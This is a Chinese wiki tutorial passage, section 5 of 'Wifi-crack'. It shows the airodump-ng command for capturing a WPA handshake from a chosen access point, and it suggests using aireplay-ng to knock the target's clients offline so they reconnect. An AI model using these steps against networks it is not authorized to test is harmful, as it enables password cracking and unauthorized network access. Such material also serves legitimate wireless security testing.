编辑“︁Wifi-crack”︁（章节）

=== 5. 使用参数过滤扫描列表，确定扫描目标===

使用命令：`airodump-ng -w <扫描结果保存的文件名> -c <无线网络信道> --bssid <目标无线 AP 的硬件地址> <处于监听模式的网卡名称>`

sudo airodump-ng -w android -c 6 --bssid 22:47:DA:62:2A:F0 wlan0mon


只有当扫描状态后面出现 ` ][ WPA handshake: 22:47:DA:62:2A:F0` 后，我们才拿到拿到进行破解的握手包。

扫描过程中如果有用户设备尝试连接 Wi-Fi 时，我们就会拿到握手包。

所以我们可以同时使用 `aireplay-ng` 对目标设备进行攻击，使其掉线重新连接，这样我们就拿到了握手包。

拿到握手包后按 Ctrl-C 结束扫描即可。